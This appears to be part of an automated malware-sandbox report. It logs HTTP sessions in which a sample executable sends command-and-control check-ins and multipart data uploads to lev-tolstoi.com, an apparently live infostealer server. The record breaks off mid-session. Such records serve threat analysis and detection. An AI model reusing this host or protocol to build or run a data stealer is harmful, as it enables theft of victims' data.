                                                                                                                                                                                                                                                                        Content-Length: 53
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 06:26:27 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                                                        2024-12-23 06:26:28 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:28 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=g9gtilvam1ignrao5ohd2gnooq; expires=Fri, 18 Apr 2025 00:13:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4RXWIn3gpe1OYeKM6kVV7gPu6BRJZWxZI46KkdpQpP30U3rYp6GnejsHVGduU4FoXLvfWxevH%2FkEKHfwovK0DUfqGleip8Rdnc0Uim3Wmcus1LLl2CDtsMDVKL1oiFUQ0w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647bbbe2542bd-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1582&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1831869&cwnd=196&unsent_bytes=0&cid=16fa89ee0f96b1b8&ts=790&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 06:26:28 UTC250INData Raw: 34 36 63 0d 0a 51 55 46 56 78 61 6a 65 56 33 59 59 73 54 58 70 44 63 76 62 72 41 42 77 55 47 53 68 33 6b 58 4a 67 35 65 45 45 45 34 30 65 31 73 36 59 79 50 6e 6b 75 70 37 56 47 76 55 46 39 4e 35 75 61 37 4a 4c 46 49 78 41 49 50 6b 49 36 6a 76 35 4f 45 38 62 45 49 57 65 58 73 6e 4e 4b 6e 62 75 33 74 55 66 63 6b 58 30 31 61 77 2b 63 6c 75 55 6d 70 47 78 4c 51 6e 71 4f 2f 31 35 58 73 68 52 42 63 34 4b 53 30 79 72 63 32 39 4d 78 64 30 33 46 43 4d 61 4b 71 78 77 6d 6b 64 4f 41 6d 44 38 6d 65 73 2b 62 57 2b 4d 67 4e 52 44 7a 6f 4d 49 43 61 75 69 71 4e 37 44 54 72 55 57 38 73 33 36 62 72 4a 59 68 77 32 41 4d 71 32 4c 61 48 6e 39 4f 42 36 50 6c 30 64 4d 79 6b 6a 4d 61 7a 48 74 43 63 61 66 74 74 62 69 6d 4b 71 2b 59 41 69 46 53 70 47 6d 2f 78 30 6d
                                                                                                                                                                                                                                                                        Data Ascii: 46cQUFVxajeV3YYsTXpDcvbrABwUGSh3kXJg5eEEE40e1s6YyPnkup7VGvUF9N5ua7JLFIxAIPkI6jv5OE8bEIWeXsnNKnbu3tUfckX01aw+cluUmpGxLQnqO/15XshRBc4KS0yrc29Mxd03FCMaKqxwmkdOAmD8mes+bW+MgNRDzoMICauiqN7DTrUW8s36brJYhw2AMq2LaHn9OB6Pl0dMykjMazHtCcafttbimKq+YAiFSpGm/x0m
                                                                                                                                                                                                                                                                        2024-12-23 06:26:28 UTC889INData Raw: 65 4c 6b 39 32 63 68 52 68 39 35 50 47 30 75 35 38 32 77 64 55 77 36 32 31 75 46 61 71 71 32 79 57 4d 53 49 41 6e 44 76 79 2b 6a 35 66 2f 70 66 53 4e 59 45 7a 34 72 4b 6a 43 6f 7a 62 51 7a 47 33 6d 54 47 63 74 6f 73 66 6d 57 49 6a 49 69 42 63 43 6f 4b 72 71 68 36 71 68 72 62 46 45 56 65 58 74 6a 4d 61 6e 4c 73 54 55 47 63 74 68 63 6a 6e 32 69 73 4d 4e 76 45 6a 38 4d 7a 4c 38 6e 72 4f 76 2f 36 58 67 6f 57 78 51 2f 49 79 4e 33 36 59 71 37 4c 56 51 69 6b 33 53 4f 66 36 36 31 32 43 41 6f 63 68 6d 4e 70 57 65 73 37 62 57 2b 4d 69 52 54 47 6a 6f 6f 4c 44 53 76 77 61 34 31 42 6e 7a 65 55 70 6c 70 72 4c 66 45 59 51 41 34 43 4d 57 2f 4c 71 44 6f 38 4f 46 32 62 42 68 5a 50 6a 74 6a 62 2b 66 72 73 54 34 59 63 4d 52 58 79 33 44 6e 6f 49 35 6c 48 6e 4a 65 67 37 67 6d
                                                                                                                                                                                                                                                                        Data Ascii: eLk92chRh95PG0u582wdUw621uFaqq2yWMSIAnDvy+j5f/pfSNYEz4rKjCozbQzG3mTGctosfmWIjIiBcCoKrqh6qhrbFEVeXtjManLsTUGcthcjn2isMNvEj8MzL8nrOv/6XgoWxQ/IyN36Yq7LVQik3SOf6612CAochmNpWes7bW+MiRTGjooLDSvwa41BnzeUplprLfEYQA4CMW/LqDo8OF2bBhZPjtjb+frsT4YcMRXy3DnoI5lHnJeg7gm
                                                                                                                                                                                                                                                                        2024-12-23 06:26:28 UTC1369INData Raw: 37 65 31 0d 0a 48 44 55 51 67 36 4e 70 73 71 48 79 36 6a 4a 30 46 68 59 32 4c 43 73 33 70 73 36 78 4d 52 56 33 33 31 36 49 59 36 57 78 77 32 34 57 50 51 37 4c 76 79 2b 35 37 2f 76 67 64 43 78 54 57 58 64 6a 4a 43 2f 6e 6b 76 77 52 47 6d 33 48 58 4d 6c 61 71 72 66 41 5a 51 52 79 47 59 32 6c 5a 36 7a 74 74 62 34 79 49 6c 73 53 4e 53 51 71 4e 71 54 4b 74 6a 73 62 63 4e 74 66 69 32 4b 6f 73 73 5a 6b 48 7a 6b 4a 7a 4c 73 76 71 4f 33 77 36 33 46 73 47 46 6b 2b 4f 32 4e 76 35 2b 2b 79 4e 67 56 72 6b 57 4b 49 59 61 65 2b 32 43 49 4e 66 42 2b 44 75 79 76 72 75 62 58 73 64 53 74 53 46 44 4d 67 4a 7a 4f 71 78 62 55 38 48 57 6a 5a 57 34 56 39 70 4c 50 4c 62 42 34 33 43 63 4f 39 4a 71 58 72 2f 71 59 38 62 46 45 42 65 58 74 6a 47 4b 72 61 72 6a 38 66 61 35 46 69 69 47
                                                                                                                                                                                                                                                                        Data Ascii: 7e1HDUQg6NpsqHy6jJ0FhY2LCs3ps6xMRV3316IY6Wxw24WPQ7Lvy+57/vgdCxTWXdjJC/nkvwRGm3HXMlaqrfAZQRyGY2lZ6zttb4yIlsSNSQqNqTKtjsbcNtfi2KossZkHzkJzLsvqO3w63FsGFk+O2Nv5++yNgVrkWKIYae+2CINfB+DuyvrubXsdStSFDMgJzOqxbU8HWjZW4V9pLPLbB43CcO9JqXr/qY8bFEBeXtjGKrarj8fa5FiiG
                                                                                                                                                                                                                                                                        2024-12-23 06:26:28 UTC655INData Raw: 49 6a 30 78 45 4d 6e 38 4f 4f 58 34 74 65 46 2b 62 41 35 5a 4d 79 38 6e 4e 4b 76 44 73 44 67 56 66 74 52 61 6a 32 2b 76 76 38 74 6a 47 54 6f 4b 7a 4c 59 72 72 2b 33 38 34 48 34 76 56 52 39 35 62 57 4d 77 76 34 72 6b 64 54 56 33 32 46 75 4c 62 4c 69 2b 6a 69 78 53 50 41 44 44 2f 48 2b 39 38 65 4c 68 62 57 4a 50 57 54 34 76 59 32 2f 6e 77 4b 34 77 47 6e 37 5a 55 6f 39 6a 6f 37 6e 4c 63 42 6f 30 41 63 2b 30 49 71 54 6e 38 4f 74 31 4a 31 55 4c 4b 79 41 6e 4f 61 75 4b 38 6e 55 54 59 70 4d 50 79 30 71 2b 75 74 35 6b 45 58 49 5a 6a 61 56 6e 72 4f 32 31 76 6a 49 73 57 42 55 79 4a 43 67 38 6f 38 36 38 4f 42 39 30 33 56 36 48 5a 36 57 2b 33 47 38 58 4f 67 7a 4b 75 53 75 6d 34 75 66 6c 63 32 77 59 57 54 34 37 59 32 2f 6e 37 59 38 43 4e 7a 72 4d 47 5a 49 76 72 72 57
                                                                                                                                                                                                                                                                        Data Ascii: Ij0xEMn8OOX4teF+bA5ZMy8nNKvDsDgVftRaj2+vv8tjGToKzLYrr+384H4vVR95bWMwv4rkdTV32FuLbLi+jixSPADD/H+98eLhbWJPWT4vY2/nwK4wGn7ZUo9jo7nLcBo0Ac+0IqTn8Ot1J1ULKyAnOauK8nUTYpMPy0q+ut5kEXIZjaVnrO21vjIsWBUyJCg8o868OB903V6HZ6W+3G8XOgzKuSum4uflc2wYWT47Y2/n7Y8CNzrMGZIvrrW
                                                                                                                                                                                                                                                                        2024-12-23 06:26:28 UTC1369INData Raw: 38 33 39 0d 0a 2b 46 33 4a 56 34 52 4b 79 49 6e 50 36 62 45 73 7a 51 51 66 39 5a 54 6a 47 75 76 74 6f 34 73 55 6a 55 65 67 2b 52 6e 68 4d 62 41 70 46 4d 57 46 67 5a 33 4f 6d 4d 77 71 34 72 6b 64 52 68 35 33 31 2b 45 61 61 43 31 78 47 73 5a 50 67 33 48 73 43 36 75 35 2f 54 6a 64 79 31 53 46 54 4d 6c 49 44 53 6f 78 62 4d 39 56 44 53 54 55 4a 4d 76 38 66 6e 72 64 52 6b 38 41 49 4f 6a 61 62 4b 68 38 75 6f 79 64 42 59 56 4d 43 55 6c 4d 71 76 4c 75 6a 30 52 63 74 64 57 6a 57 6d 71 74 73 70 6e 45 7a 30 43 7a 37 49 74 71 75 44 35 37 58 30 6e 55 31 6c 33 59 79 51 76 35 35 4c 38 42 42 64 73 78 45 65 48 4c 37 62 33 31 79 49 56 50 6b 61 62 2f 43 61 35 36 2f 2f 6f 64 79 4e 54 47 6a 59 6b 4c 6a 47 72 77 4c 55 39 45 6e 58 61 52 59 68 6a 70 37 37 41 62 68 77 2f 44 4d 43
                                                                                                                                                                                                                                                                        Data Ascii: 839+F3JV4RKyInP6bEszQQf9ZTjGuvto4sUjUeg+RnhMbApFMWFgZ3OmMwq4rkdRh531+EaaC1xGsZPg3HsC6u5/Tjdy1SFTMlIDSoxbM9VDSTUJMv8fnrdRk8AIOjabKh8uoydBYVMCUlMqvLuj0RctdWjWmqtspnEz0Cz7ItquD57X0nU1l3YyQv55L8BBdsxEeHL7b31yIVPkab/Ca56//odyNTGjYkLjGrwLU9EnXaRYhjp77Abhw/DMC
                                                                                                                                                                                                                                                                        2024-12-23 06:26:28 UTC743INData Raw: 75 66 73 64 53 74 64 45 54 49 73 4a 53 57 72 78 4b 34 77 42 6d 69 54 47 63 74 6f 73 66 6d 57 49 69 51 31 46 74 4f 2f 5a 5a 72 33 39 76 42 35 49 56 70 5a 4a 6d 30 36 64 36 44 47 2f 47 31 55 66 4e 78 65 69 47 43 6f 73 4d 4a 76 46 7a 73 44 77 72 6f 6a 6f 65 76 31 34 48 51 74 55 78 4d 36 49 69 6b 2b 6f 4d 4b 37 4e 67 59 36 6e 52 65 4d 64 2b 6e 68 6a 6b 73 56 49 41 6a 54 2f 44 6a 6c 2b 4c 58 68 66 6d 77 4f 57 54 30 70 4c 44 4f 67 78 72 6f 77 45 6e 66 53 57 49 70 76 70 72 33 46 61 78 51 7a 43 38 61 78 49 37 6e 72 2f 75 6c 2b 4a 56 6f 55 65 57 31 6a 4d 4c 2b 4b 35 48 55 6c 64 39 31 5a 6a 48 6e 70 70 6f 42 37 55 6a 55 4b 67 2b 52 6e 71 75 33 36 35 58 30 76 56 52 67 7a 4d 54 45 37 72 73 4b 35 4f 52 39 30 31 55 57 4e 59 4b 43 36 7a 57 73 56 4f 67 72 4a 76 79 44 72
                                                                                                                                                                                                                                                                        Data Ascii: ufsdStdETIsJSWrxK4wBmiTGctosfmWIiQ1FtO/ZZr39vB5IVpZJm06d6DG/G1UfNxeiGCosMJvFzsDwrojoev14HQtUxM6Iik+oMK7NgY6nReMd+nhjksVIAjT/Djl+LXhfmwOWT0pLDOgxrowEnfSWIpvpr3FaxQzC8axI7nr/ul+JVoUeW1jML+K5HUld91ZjHnppoB7UjUKg+Rnqu365X0vVRgzMTE7rsK5OR901UWNYKC6zWsVOgrJvyDr
                                                                                                                                                                                                                                                                        2024-12-23 06:26:28 UTC1369INData Raw: 38 32 64 0d 0a 36 2f 50 42 64 39 32 6c 47 41 62 4b 4f 32 79 57 51 57 4d 67 33 45 73 69 47 75 36 76 79 6d 50 47 78 52 41 58 6c 37 59 78 47 45 32 4b 34 48 47 6e 6e 49 46 35 51 68 73 50 6e 4a 62 6c 4a 71 52 73 69 30 4b 4c 6e 6b 2f 4f 35 32 4a 56 59 64 4d 79 34 6b 4e 36 4c 48 75 54 45 61 66 74 52 58 68 32 43 75 73 63 46 6d 45 6a 31 47 6a 66 77 67 73 36 47 74 70 6c 49 6e 51 44 67 33 4b 44 46 33 75 49 53 6c 64 52 4e 32 6b 77 2f 4c 59 61 43 34 78 6d 77 65 4f 67 4c 52 76 43 79 69 37 76 54 70 63 69 39 58 45 7a 45 78 4a 54 65 73 77 72 73 39 45 48 54 42 56 6f 51 76 35 2f 6e 4a 65 6c 4a 71 52 76 4b 71 49 4b 7a 75 74 38 39 31 4e 31 63 54 4f 69 67 76 64 37 69 45 70 58 55 54 64 70 4d 50 79 32 4b 6c 74 4d 70 77 48 6a 49 47 79 72 73 74 75 65 37 36 36 33 45 73 55 77 73 34
                                                                                                                                                                                                                                                                        Data Ascii: 82d6/PBd92lGAbKO2yWQWMg3EsiGu6vymPGxRAXl7YxGE2K4HGnnIF5QhsPnJblJqRsi0KLnk/O52JVYdMy4kN6LHuTEaftRXh2CuscFmEj1Gjfwgs6GtplInQDg3KDF3uISldRN2kw/LYaC4xmweOgLRvCyi7vTpci9XEzExJTeswrs9EHTBVoQv5/nJelJqRvKqIKzut891N1cTOigvd7iEpXUTdpMPy2KltMpwHjIGyrstue7663EsUws4
                                                                                                                                                                                                                                                                        2024-12-23 06:26:28 UTC731INData Raw: 76 4c 75 7a 49 66 61 4e 68 46 67 47 65 71 74 38 5a 72 45 6a 77 47 77 72 45 6e 36 36 2b 31 34 57 70 73 44 6c 6b 63 41 44 51 68 72 59 69 66 49 67 4a 77 31 46 75 64 5a 4b 69 36 32 47 38 43 63 6b 69 44 72 53 43 36 6f 61 33 77 59 6a 74 52 42 6e 63 36 59 7a 43 72 69 75 52 31 48 33 58 64 57 6f 42 72 6f 4c 7a 47 59 52 63 33 44 4d 2b 77 4a 71 50 6f 2f 2b 4e 33 4b 6c 77 61 4e 79 77 69 4f 36 50 44 73 6a 78 55 4e 4a 4e 51 6b 79 2f 78 2b 66 68 79 46 53 6f 4c 30 2f 34 56 71 50 44 6b 38 33 38 38 55 46 73 57 49 43 38 30 6f 73 32 73 64 51 73 30 79 68 65 4d 59 2b 6e 68 6a 6d 49 57 50 67 58 45 73 69 69 6d 37 76 4c 74 66 53 5a 59 43 7a 59 6d 4b 7a 75 76 78 36 34 2f 48 6d 6a 61 58 6f 5a 68 6f 61 76 4e 49 6c 78 79 41 64 76 38 66 2b 76 54 2f 2b 56 2b 4f 6c 73 57 65 54 78 74 4c
                                                                                                                                                                                                                                                                        Data Ascii: vLuzIfaNhFgGeqt8ZrEjwGwrEn66+14WpsDlkcADQhrYifIgJw1FudZKi62G8CckiDrSC6oa3wYjtRBnc6YzCriuR1H3XdWoBroLzGYRc3DM+wJqPo/+N3KlwaNywiO6PDsjxUNJNQky/x+fhyFSoL0/4VqPDk8388UFsWIC80os2sdQs0yheMY+nhjmIWPgXEsiim7vLtfSZYCzYmKzuvx64/HmjaXoZhoavNIlxyAdv8f+vT/+V+OlsWeTxtL
                                                                                                                                                                                                                                                                        2024-12-23 06:26:28 UTC1369INData Raw: 38 30 31 0d 0a 31 54 43 6d 64 46 34 39 2b 36 65 47 65 4d 45 6c 6e 56 5a 54 73 64 62 53 76 37 4b 5a 6b 62 41 35 4c 64 32 4d 78 64 2f 2b 4b 2b 7a 59 47 61 4e 56 55 6e 57 7a 75 68 2f 42 46 43 44 38 41 31 4b 30 5a 6c 65 62 76 36 33 51 37 52 31 55 73 49 43 30 35 6f 4e 7a 38 65 31 52 31 6b 77 2b 79 4c 2b 48 35 38 53 78 53 4b 6b 61 62 2f 42 4b 6f 37 2f 76 68 5a 44 30 62 50 69 4d 75 4a 53 43 32 69 76 4a 31 45 6a 71 4c 42 38 55 76 72 61 69 4f 4f 6b 4a 67 58 5a 62 76 63 50 75 7a 36 71 68 72 62 45 42 5a 59 58 46 74 64 37 57 4b 35 48 56 54 65 63 46 46 6a 57 79 2f 75 6f 6c 63 4c 42 77 42 78 62 6b 67 75 36 50 62 37 57 59 72 46 6c 64 35 4c 47 4e 76 6e 6f 72 30 64 53 73 30 6b 30 2f 4c 4e 2b 6d 4d 7a 57 77 63 4e 52 44 53 38 51 6d 73 35 2f 44 68 59 6d 35 34 45 69 30 6b 59
                                                                                                                                                                                                                                                                        Data Ascii: 8011TCmdF49+6eGeMElnVZTsdbSv7KZkbA5Ld2Mxd/+K+zYGaNVUnWzuh/BFCD8A1K0Zlebv63Q7R1UsIC05oNz8e1R1kw+yL+H58SxSKkab/BKo7/vhZD0bPiMuJSC2ivJ1EjqLB8UvraiOOkJgXZbvcPuz6qhrbEBZYXFtd7WK5HVTecFFjWy/uolcLBwBxbkgu6Pb7WYrFld5LGNvnor0dSs0k0/LN+mMzWwcNRDS8Qms5/DhYm54Ei0kY


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.549707104.21.66.864435600C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 06:26:30 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=0UCQVNE1GL0P
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 12805
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 06:26:30 UTC12805OUTData Raw: 2d 2d 30 55 43 51 56 4e 45 31 47 4c 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 36 46 36 30 37 31 46 46 34 43 34 32 41 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 55 43 51 56 4e 45 31 47 4c 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 55 43 51 56 4e 45 31 47 4c 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 55 43 51 56 4e 45 31
                                                                                                                                                                                                                                                                        Data Ascii: --0UCQVNE1GL0PContent-Disposition: form-data; name="hwid"CA6F6071FF4C42A1AC8923850305D13E--0UCQVNE1GL0PContent-Disposition: form-data; name="pid"2--0UCQVNE1GL0PContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--0UCQVNE1
                                                                                                                                                                                                                                                                        2024-12-23 06:26:31 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:30 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=s1vc10f2lgsbtf6l4h3ouhvqc6; expires=Fri, 18 Apr 2025 00:13:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bojmhzCEVES89E1M3ZPXXFTQuTPwbVj9TzCUdxFQ3Fn6VlPQQbTjAW7R%2FYK2IMFLxJ2ANlw58O4j85BvOzm%2BrUfY9Y71M%2BKutEM0wOcd%2B%2B7PaKoOfsDFDufHMTPXBEiQ728%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647ca88854394-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2159&min_rtt=1773&rtt_var=941&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13738&delivery_rate=1646926&cwnd=168&unsent_bytes=0&cid=8a88cac5f979793b&ts=1070&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 06:26:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-23 06:26:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        4192.168.2.549708104.21.66.864435600C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 06:26:32 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=BHAYJ4KONJV7SU6NGE
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 15083
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 06:26:32 UTC15083OUTData Raw: 2d 2d 42 48 41 59 4a 34 4b 4f 4e 4a 56 37 53 55 36 4e 47 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 36 46 36 30 37 31 46 46 34 43 34 32 41 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 48 41 59 4a 34 4b 4f 4e 4a 56 37 53 55 36 4e 47 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 48 41 59 4a 34 4b 4f 4e 4a 56 37 53 55 36 4e 47 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                                                                                                        Data Ascii: --BHAYJ4KONJV7SU6NGEContent-Disposition: form-data; name="hwid"CA6F6071FF4C42A1AC8923850305D13E--BHAYJ4KONJV7SU6NGEContent-Disposition: form-data; name="pid"2--BHAYJ4KONJV7SU6NGEContent-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                                                                                                        2024-12-23 06:26:33 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:33 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=pi3vrq2pt90813okkvjl0e6lbl; expires=Fri, 18 Apr 2025 00:13:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WvGEd0QjMCs6ZjTVYqW%2FXvwd9bjBrQmcpzIq6ZyW1j%2BgxTx08CDzTvamkXbvj%2Fpio66G0ZWo6r2XWfhUtzpvPg9iXO0q1qHsMeXyCqlwWi%2FnTjxC0s94R5QsLY02hUaj5g8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647d99b510f6f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1482&rtt_var=561&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16022&delivery_rate=1941489&cwnd=209&unsent_bytes=0&cid=2714011922ad15d0&ts=1000&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 06:26:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-23 06:26:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        5192.168.2.549709104.21.66.864435600C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 06:26:34 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=I71U69D925SI
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 20537
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
